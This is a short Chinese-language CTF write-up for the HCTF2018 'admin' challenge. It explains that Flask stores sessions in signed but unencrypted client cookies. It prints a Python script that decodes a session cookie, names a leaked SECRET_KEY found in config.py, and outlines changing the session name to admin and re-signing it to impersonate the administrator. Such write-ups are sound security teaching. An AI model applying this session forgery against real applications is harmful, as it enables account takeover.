HCTF2018-admin[flask session 伪造]

知识点：flask session 伪造

flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而fla没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题

这道题源码泄露，是用flask写的（看了一下一些师傅的wp，说是看到flask直接去看一下路由）判断一下具有的功能

通过脚本将session解密：

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

要想生成admin的session还需要SECRET_KEY

在config.py里发现了SECRET_KEY

SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'

将刚才解密出来的session里的name更换成admin，再加密。

网上找到加密脚本

学习链接：

Python Web之flask session&格式化字符串漏洞

客户端 session 导致的安全问题